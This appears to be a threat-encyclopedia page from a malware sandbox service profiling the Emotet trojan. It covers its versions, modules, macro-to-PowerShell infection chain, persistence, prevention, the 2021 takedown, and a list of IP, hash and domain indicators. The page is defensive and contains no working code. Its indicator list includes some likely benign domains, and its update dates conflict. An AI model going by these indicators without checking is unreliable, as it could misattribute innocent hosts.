Emotet

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Type
Trojan
Origin
ex-USSR
First seen
1 June, 2014
Last seen
23 October, 2021
Also known as
Heodo
Geodo
Global rank
1
Week rank
5
Month rank
5
IOCs
32715

What is Emotet Trojan?

Emotet is an extremely sophisticated and destructive Trojan used to download and install other malware. First recorded in 2014 it was classified as a banking trojan, but Emotet has gained advanced capabilities over the course of its lifetime and evolved into an entire malware distribution service.

So what makes the Emotet virus so dangerous? Based on the analysis, Emotet can act like a worm and spread using local networks, which makes it extremely hard to clean up. In addition to this, the Trojan has advanced persistence and anti-evasion mechanics, such as the ability to detect sandboxes and virtual machines with an option to generate false indicators to throw researches off.

On top of that, the Trojan has a polymorphic design – meaning that it can change its code to bypass signature-based detection, making this cyber defense strategy useless against its’ attacks. If that wasn’t enough, Emotet can receive updates from the control server, performing this operation as if an operating system update is being installed. This allows the Trojan to drop additional malware onto the infected machine stealthily.

It should also be noted that the Emotet trojan has a modular design which makes it possible to adapt this malware to various tasks and customize it for every particular campaign, giving the attackers maximum flexibility. Emotet's main targets are governments, corporations, small businesses, and individuals, focusing on Europe, America, and Canada.

General description of Emotet

The first version of Emotet malware which was spotted in the wild all the way back in 2014 was designed to steal banking credentials by intercepting internet traffic and was much more basic than the beast of a Trojan which we know today. When Emotet was first spotted in the wild, the malware targeted mainly banks from Germany and Austria using only its native information stealing toolset.

Version two followed shortly after, this time carrying several additional modules such as a money transfer, mail spam, DDoS, and address book stealing modules. The third iteration of Emotet was released in 2015, this time attackers focused on upgrading the anti-evasion functionality of the malware and introducing banks from Switzerland into the list of potential victims.

The next overhaul of the Emotet malware followed in December 2016, changing the attack vector of the virus. At the beginning of its lifetime Version 4 heavily relied on the RIG 4.0 exploit kit to make its way into the victims' computers later switching primarily to mail spam. The same iteration of the malware also marked the moment when the primary use case of the malware started shifting from using its own banking module to dropping other Trojans onto infected machines.

Speaking of modules, Emotet malware can perform a large number of malicious activities that vary depending on the modules used in a particular campaign. Most versions of the virus included a spam module that can be used to continue the spread of the malware by sending out a series of malicious emails from the infected machine. Another normally included module is the one used for credential stealing, allowing Emotet to steal sensitive information from web browsers and mail clients.

Starting from 2017, Emotet trojan began coming equipped with a spreader module, allowing the malware to infect all machines connected via a local network. The virus also gained the address book stealer module – this one is interesting. It analyzes the relationship between email senders and receivers and uses the collected information to enhance the effectiveness of subsequent campaigns originating from the users’ PC, allowing to target friends, family members, and colleagues of the victim with personalized spam emails.

Not only does Emotet malware provide flexible functionality through the use of modules and has several anti-evasion functions, but it also puts a heavy emphasis on persistence. To ensure that the malware stays in the infected machine, it injects into running processes, downloads additional payloads, often targeting the Explorer.exe. In addition to that, the malware uses Scheduled Tasks and makes registry keys changes.

It should be noted that the mentioned Trojan versions are extremely destructive and its attacks can have several consequences, such as loss of private data, inability to operate the infected PC up to its complete disability, and financial losses associated with restoring the infrastructure damaged by the malware. In fact, one company was forced to spend an excess of one million dollars in order to deal with the aftermath of an Emotet attack.

Emotet malware analysis

A video recorded in the ANY.RUN malware hunting service displays the execution process of Emotet, allowing to perform the analysis of the malware behavior in a lot of detail.

emotet execution process tree

Figure 1: Displays the processes list generated by the ANY.RUN malware hunting service

text report of the Emotet analysis

Figure 2: Even more information about the execution of Emotet can be found in customizable text reports generated by ANY.RUN

Emotet execution process

Considering that the primary way in which the Emotet trojan is distributed is through malicious email spam campaigns, the first step in the chain of infection involves tricking the potential victim into opening an attached Microsoft Office file using social engineering. After the file has been opened and macros enabled, there is no need for additional user actions. Downloaded files contain malicious VBA code that runs after a document has been opened. One of the possible options of the infection process is when the VBA code utilizes WMI to launch a Powershell code which downloads the payload – a malicious executable file from the webserver. Notably, the Powershell script is encoded. Emotet makes steps to maintain a presence in the infected system - it copies itself into %AppData% subfolders and changes the autorun value in the registry. Besides that malware allows its attackers to download additional payloads. Through all infection processes, the malware sends information to and from a server. As the last execution step, Emotet waits for commands from command-and-control servers.

Prevention of Emotet attacks

To minimize the risk of Emotet virus infection and potential destruction if such infection does occur, users are advised to follow a set of standard best practices, such as not downloading files from suspicious emails and keeping an updated version of antivirus on the machine at all times.

For organizations, it is advised to restrict inbound SMB communication between client systems in order to prevent Emotet from spreading from one machine to another within the local network, provide security training for personnel and instruct employees about the danger of mail spam as well as take all possible precautions to filter out potentially malicious emails at the firewall.

How does Emotet spread?

According to the analysis, the main distribution method of Emotet malware is malicious email campaigns. The trojan uses its address book stealer module in order to pull the contacts from the email account of its victim and send its payloads to found contacts from the hijacked account.

Bearing in mind that potential victims are receiving an email from somebody they know and trust, Emotet has a very high chance of a successful attack. The received email usually contains a link to a malicious URL that downloads the malware and launches the payload when clicked. However, email spam is not the only distribution Method that this malware utilizes. It may also take advantage of certain Windows vulnerabilities, thus the malware can make its way into a machine completely “silently”, without the user ever knowing about it.

How to collect Emotet’s IOCs using ANY.RUN?

For your detailed Emotet malware analysis ANY.RUN's "Fake Net" feature will be very useful. It intercepts HTTP requests and returns a 404 error, forcing malware to reveal its command-and-control server links.

To turn it on in "Advanced mode" of the "New task" window check the box next to the "Fake net" in the "Network" section.

fake net emotet Figure 3: Run Emotet sample with turn on "Fake net" feature

Conclusion

Emotet malware is one of the most sophisticated and destructive trojans. Since its first introduction all the way back in 2014, the malware has underground a substantial evolution gaining a lot of anti-evasion features, obtaining worm-like functionality, and even changing the main focus from information-stealing to installing other trojans onto infected machines. Thanks to the ability to spread to adjacent systems, Emotet can easily infect all machines in a single network, making dealing with the consequences of an attack a true nightmare. The situation is further worsened by the fact that the malware is equipped with a series of anti-evasion tricks that make analyzing it quite difficult. As a result, the process of developing countermeasures is much more complicated in comparison to more simple and straightforward trojans.

01/28/20 Update: In January 2021 Emotet botnet was taken down by law enforcement. The global effort, known as Operation Ladybird, located the malware infrastructure around the globe. They arrested at least two of the cybercriminal gang members in Ukraine. Their attackers' names were not uncovered.

Security experts teamed up and simultaneously hijacked hundreds of Emotet command-and-control servers and disrupted its backups, too. Researchers placed their own machines at the IP addresses of crooks’ computers and made the payload inactive to prevent connection with the botnet.

These actions lead to the fact that Emotet’s C2 servers don’t work anymore and it can’t cause any harm to the infected machine. Right now the malware comeback seems impossible.

Dutch police officials used their access to two crucial servers located in the country in order to deploy an Emotet update to all infected hosts that will remove the malware from all infected computers on March 25, 2021.

Thankfully, modern online hunting services like ANY.RUN are equipped with equally advanced research functions and allows professionals to study cyber threats with maximum efficiency, helping researchers to battle elusive malware like Emotet.

IOCs

IP addresses
104.236.246.93
209.141.41.136
45.33.54.74
50.28.51.143
181.37.126.2
38.88.126.202
51.38.124.206
91.105.94.200
208.84.149.100
203.198.129.4
174.36.13.237
88.99.115.33
61.19.254.63
134.209.36.254
71.72.196.159
212.71.234.16
5.189.168.53
118.243.83.70
209.151.248.242
139.162.60.124
Hashes
1ad1ff05930f27ef4b349c7a612235d1632ef7ceaa1a17adf7c7b3a97b40ca4d
3a9494f66babc7deb43f65f9f28c44bd9bd4b3237031d80314ae7eb3526a4d8f
52025c86ec0b35f42f22742b92c4bbca97bef3f3f7593b488af738e16673048d
05c5bcedf32b91a25f16fb760a3440db10ca5f166e49d2724e7bb93c8543cc08
3ce0b9ca45ae36be8a3d22ccff44a30207cd179d309b44163f74083826c9e663
01270902c3ac04c37b13916ad30fd74986f6b9764fe5c86f202e095f798100a4
7a26d7944ec5b78feb113e3ebae12fccc1a4537ffc32508e8bad5a382e9145cc
3ece5b9b043274d12e628cd667cb9a6b9b23ad4c3c3db7504ec435dadc50f0b1
939c575e17fcf1afbe2889a4ddb44f095ff3a07cdf9f5dd3d5c7f49e93da68c0
279f77d5c95cd7b415ed0798a3f807c77b6c17dc90510a60ad67ab962808ceee
c2cf9e96c750ca526fda5c82efeadab0735bcba40f95a14cc379c4de8d9da717
4c4df0964e806a37f38f63c4eec8c5320639c93d943456c3aed7aec2f1f888d6
d23f53a191681337acdc6a863b9723e57fca7708254db29efa2382896e6df2bd
28d0a9fcfd2d6f80f6b6c75bc502b67047e30b1a6b3e3f498b3825f8e69d25d2
0fdf16a57528ee482ff53cc344eb9d1ad658efe0794a1c666616fbd9165e395e
336bf2e203fa8c32548fb08716ac852a32304e9fc77aa3390f990bc6b4d6fc2c
f371fe43d8bd779a60cc05ead471184917049323b51189f5928554a5a5f4d8dd
4d9de1a23d2ad1fbd45d2f708c88fad1e8325fb2138da7c7adea714991561a67
44c9581fdd28094976f92e31e08b49d2905f21358b46f6002561f1641681a784
8908dc56615454ccd30f56b9a99c3bb8d3e1ded95c765c8a0dfa9aa8dd49bab5
Domains
isns.net
qxq.ddns.net
krupskaya.com
m-onetrading-jp.com
majul.com
thuocnam.tk
pool.ug
elx01.knas.systems
booking.msg.bluhotels.com
booking.msg.bluhotels.com
192-168-100-87.abcdefghijklmnopqrstuvwxyz012345.plex.direct
statistiche.leevee.it
www.campingamicidilazise.it
www.u44.pnc.com
ticket.ipv10.eu
3jkpvk2m8y.dattolocal.net
adonis-medicine.at
defuse.ca
file.litgid.org
oshibki-bytovoj-tehniki.com

HAVE A LOOK AT

Adwind screenshot
Adwind
adwind trojan
Adwind RAT, sometimes also called Unrecom, Sockrat, Frutas, jRat, and JSocket, is a Malware As A Service Remote Access Trojan that attackers can use to collect information from infected machines. It was one of the most popular RATs in the market in 2015.
Read More
Agent Tesla screenshot
Agent Tesla
agenttesla trojan rat stealer
Agent Tesla is spyware that collects information about the actions of its victims by recording keystrokes and user interactions. It is falsely marketed as a legitimate software on the dedicated website where this malware is sold.
Read More
Ave Maria screenshot
Ave Maria
avemaria stealer trojan rat
Ave Maria malware is a Remote Access Trojan that is also called WARZONE RAT. Hackers use it to control the PCs of their victims remotely and steal information from infected PCs. For example, they can remotely activate the camera to take pictures of a victim and send them to a control server.
Read More
Azorult screenshot
Azorult
azorult trojan rat
AZORult can steal banking information, including passwords and credit card details, as well as cryptocurrency. This constantly updated information stealer malware should not be taken lightly, as it continues to be an active threat.
Read More
Crimson RAT screenshot
Crimson RAT
crimson rat trojan
Crimson is a Remote Access Trojan — a malware that is used to take remote control of infected systems and steal data. This particular RAT is known to be used by a Pakistani founded cybergang that targets Indian military objects to steal sensitive information.
Read More
Danabot screenshot
Danabot
danabot trojan stealer
Danabot is an advanced banking Trojan malware that was designed to steal financial information from victims. Out of the Trojans in the wild, this is one of the most advanced thanks to the modular design and a complex delivery method.
Read More